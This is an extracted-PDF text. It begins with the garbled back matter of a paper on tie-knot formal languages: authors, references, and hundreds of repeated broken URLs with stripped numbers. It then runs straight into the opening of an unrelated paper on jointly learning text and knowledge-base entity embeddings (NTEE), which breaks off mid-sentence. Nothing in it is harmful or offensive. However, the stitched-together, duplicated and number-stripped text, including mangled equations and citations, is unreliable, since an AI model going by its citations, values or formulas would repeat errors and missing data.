http://tieknots.johanssons.org http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. competing interests dh and mlp are employees of upstanding hackers inc. author contributions • dan hirsch and anders sandberg analyzed the data, wrote the paper, reviewed drafts of the paper. • ingemar markström analyzed the data, performed the computation work, reviewed drafts of the paper. • meredith l. patterson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • mikael vejdemo-johansson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data deposition the following information was supplied regarding the deposition of related data: figshare: http://dx.doi.org/ . /m .figshare. . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references chomsky n, schützenberger m p. . the algebraic theory of context-free languages. studies in logic and the foundations of mathematics : – . fink t, mao y. . designing tie knots by random walks. nature ( ): – doi . / . fink t, mao y. . tie knots, random walks and topology. physica a: statistical mechanics and its applications ( ): – doi . /s - ( ) - . fink t, mao y. . the ways to tie a tie. london: fourth estate. gruber h, lee j, shallit j. . enumerating regular expressions and their languages. arxiv preprint. arxiv: . . knorr a. . eldredge reloaded. http://xirdalium.net. [blog post] available at http://xirdalium. net/ / / /eldredge-reloaded/ (accessed december ). krasny a. a. eldredge tie knot—how to tie a eldredge necktie knot. http://agreeordie.com. [blog post] available at http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge- knot (accessed december ). krasny a. b. trinity tie knot—how to tie a trinity necktie knot. http://agreeordie.com. [blog post] available at http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott (accessed december ). sipser m. . introduction to the theory of computation. vol. . boston: thomson course technology. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://arxiv.org/abs/ . http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://xirdalium.net/ / / /eldredge-reloaded/ http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott http://dx.doi.org/ . /peerj-cs. stanley rp. . enumerative combinatorics, cambridge studies in advanced mathematics , vol. . cambridge: cambridge university press. stanley rp. . enumerative combinatorics, cambridge studies in advanced mathematics , vol. . cambridge: cambridge university press. vejdemo-johansson m. . random tie knots webpage. available at http://dx.doi.org/ . /m . figshare. (accessed february ). wachowski a, wachowski l, silver j, reeves k, fishburne l, moss c, weaving h, smith j, foster g, perrineau h et al. . the matrix reloaded [film]. usa: warner bros. pictures. hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. more ties than we thought introduction formal languages the anatomy of a necktie a language for tie-knots language complexity single-depth tucks recursive tucks classification of the tie-knot language enumeration generating functions tables of counts aesthetics conclusion acknowledgements references learning distributed representations of texts and entities from knowledge base ikuya yamada , hiroyuki shindo hideaki takeda yoshiyasu takefuji ikuya@ousia.jp shindo@is.naist.jp takeda@nii.ac.jp takefuji@sfc.keio.ac.jp studio ousia, japan, nara institute of science and technology, japan national institute of informatics, japan, keio university, japan abstract we describe a neural network model that jointly learns distributed representations of texts and knowledge base (kb) entities. given a text in the kb, we train our proposed model to predict entities that are relevant to the text. our model is designed to be generic with the ability to address various nlp tasks with ease. we train the model using a large cor- pus of texts and their entity annotations ex- tracted from wikipedia. we evaluated the model on three important nlp tasks (i.e., sen- tence textual similarity, entity linking, and fac- toid question answering) involving both unsu- pervised and supervised settings. as a result, we achieved state-of-the-art results on all three of these tasks. our code and trained models are publicly available for further academic re- search. introduction methods capable of learning distributed representa- tions of arbitrary-length texts (i.e., fixed-length con- tinuous vectors that encode the semantics of texts), such as sentences and paragraphs, have recently attracted considerable attention (le and mikolov, ; kiros et al., ; li et al., ; wieting et al., ; hill et al., b; kenter et al., ). these methods aim to learn generic representations that are useful across domains similar to word em- bedding methods such as word vec (mikolov et al., b) and glove (pennington et al., ). another interesting approach is learning dis- tributed representations of entities in a knowledge https://github.com/studio-ousia/ntee base (kb) such as wikipedia and freebase. these methods encode information of entities in the kb into a continuous vector space. they are shown to be effective for various kb-related tasks such as en- tity search (hu et al., ), entity linking (hu et al., ; yamada et al., ), and link prediction (bordes et al., ; wang et al., ; lin et al., ). in this paper, we describe a novel method to bridge these two different approaches. in particular, we propose neural text-entity encoder (ntee), a neural network model to jointly learn distributed representations of texts (i.e., sentences and para- graphs) and kb entities. for every text in the kb, our model aims to predict its relevant entities, and places the text and the relevant entities close to each other in a continuous vector space. we use human- edited entity annotations obtained from wikipedia (see table ) as supervised data of relevant entities to the texts containing these annotations. note that, kb entities have been conventionally used to model semantics of texts. a representa- tive example is explicit semantic analysis (esa) (gabrilovich and markovitch, ), which repre- sents the semantics of a text using a sparse vector space, where each dimension corresponds to the rel- evance score of the text to each entity. essentially, esa shows that text can be accurately represented using a small set of its relevant entities. based on entity annotations in wikipedia can be viewed as su- pervised data of relevant entities because wikipedia instructs its contributors to create annotations only where they are relevant in its manual: https://en.wikipedia.org/ wiki/wikipedia:manual_of_style transactions of the association for computational linguistics, vol. , pp. – , . action editor: kristina toutanova . submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. this fact, we hypothesize that we can use the anno- tations of relevant entities as the supervised data of learning text representations. furthermore, we also consider that placing texts and entities into the same vector space enables us to easily compute the simi- larity between texts and entities, which can be bene- ficial for various kb-related tasks. in order to test this hypothesis, we conduct three experiments involving both the unsupervised and the supervised tasks. first, we use standard semantic textual similarity datasets to evaluate the quality of the learned text representations of our method in an unsupervised fashion. as a result, our method clearly outperformed the state-of-the-art methods. furthermore, to test the effectiveness of our method to perform kb-related tasks, we address the following two important problems in the super- vised setting: entity linking (el) and factoid ques- tion answering (qa). in both tasks, we adopt a sim- ple multi-layer perceptron (mlp) classifier with the learned representations as features. we tested our method using two standard datasets (i.e., conll and tac ) for the el task and a popular factoid qa dataset based on the quiz bowl quiz game for the factoid qa task. as a result, our method out- performed recent state-of-the-art methods on both the el and the factoid qa tasks. additionally, there have also been proposed meth- ods that map words and entities into the same con- tinuous vector space (wang et al., ; yamada et al., ; fang et al., ). our work differs from these works because we aim to map texts (i.e., sentences and paragraphs) and entities into the same vector space. our contributions are summarized as follows: • we propose a neural network model that jointly learns vector representations of texts and kb entities. we train the model using a large amount of entity annotations extracted directly from wikipedia. • we demonstrate that our proposed representa- tions are surprisingly effective for various nlp tasks. in particular, we apply the proposed model to three different nlp tasks, namely se- mantic textual similarity, entity linking, and factoid question answering, and achieve state- of-the-art results on all three tasks. the lord of the rings is an epic high-fantasy novel written by english author j. r. r. tolkien. entity annotations: the lord of the rings, epic (genre), high fantasy, j. r. r. tolkien table : an example of a sentence with entity annota- tions. • we release our code and trained models to the community at https://github.com/ studio-ousia/ntee to facilitate further academic research. our approach in this section, we propose our approach of learn- ing distributed representations of texts and entities in kb. . model given a text t (a sequence of words w , ..., wn ), we train our model to predict entities e , ..., en that ap- pear in t. formally, the probability that represents the likelihood of an entity e appearing in t is defined as the following softmax function: p (e|t) = exp(ve >vt)∑ e′∈ekb exp(ve′ >vt) , ( ) where ekb is a set of all entities in kb, and ve ∈ rd and vt ∈ rd are the vector representations of the entity e and the text t, respectively. we compute vt using the element-wise sum of word vectors in t with l normalization and a fully connected layer. let us denote vs as a vector of the sum of word vectors (vs = ∑n i= vwi ), vt is computed as follows: vt = w vs ‖vs‖ + b, ( ) where w ∈ rd×d is a weight matrix, and b ∈ rd is a bias vector. here, we initialize vw and ve using the pre-trained representations described in the next section. the loss function of our model is defined as fol- lows: l = − ∑ (t,et)∈Γ ∑ e∈et log p (e|t), ( ) where Γ denotes a set of pairs each of which consists of a text t and its entity annotations et in kb. one problem in training our model is that the de- nominator in eq. ( ) is computationally very expen- sive because it involves summation over all entities in kb. we address this problem by replacing ekb in eq. ( ) with e∗, which is the union of the positive entity e and the randomly chosen k negative entities that do not appear in t. this method can be viewed as negative sampling (mikolov et al., b) with a uniform negative distribution. in addition, because the length of a text t is ar- bitrary in our model, we test the following two set- tings: t as a paragraph, and t as a sentence . . parameters the parameters to be learned by our model are the vector representations of words and entities in our vocabulary v , the weight matrix w , and the bias vector b. consequently, the total number of parame- ters in our model is |v |×d + d + d. we initialize the representations of words and entities using pre-trained representations to reduce the training time. we use the skip-gram model of word vec (mikolov et al., a; mikolov et al., b) with negative sampling trained with wikipedia articles. in order to create a corpus for the skip-gram model from wikipedia, we sim- ply replace the name of each entity annotation in wikipedia articles with the unique identifier of the entity the annotation refers to. this simple method enables us to easily train the distributed represen- tations of words and entities simultaneously. we used a wikipedia dump generated in july . for the hyper-parameters of the skip-gram model, we used standard parameters such as the context win- dow size being , and the size of negative samples being . we used the python word vec implemen- tation in gensim . additionally, the entity represen- tations were normalized to unit length before they were used as the pre-trained representations. we use the open-source apache opennlp to detect sen- tences. the wikipedia dump was downloaded from wikimedia downloads: https://dumps.wikimedia.org/ https://radimrehurek.com/gensim/ . corpus we trained our model by using the english dbpe- dia abstract corpus (brümmer et al., ), an open corpus of wikipedia texts with entity annotations manually created by wikipedia contributors. it was extracted from the first introductory sections of . million wikipedia articles. we train our model by iterating over the texts and their entity annotations in the corpus. we used words that appear five times or more and entities that appear three times or more in the cor- pus, and simply ignored the other words and entities. as a result, our vocabulary v consisted of , words and , entities. further, the number of valid words and entity annotations were approxi- mately million and million, respectively. additionally, we also introduce one heuristic method to generate entity annotations. for each text, we add a pseudo-annotation that points to the entity of which the kb page is the source of the text. be- cause every kb page describes its corresponding en- tity, it typically contains many mentions referring to the entity. however, because hyper-linking to the web page itself does not make sense, these kinds of 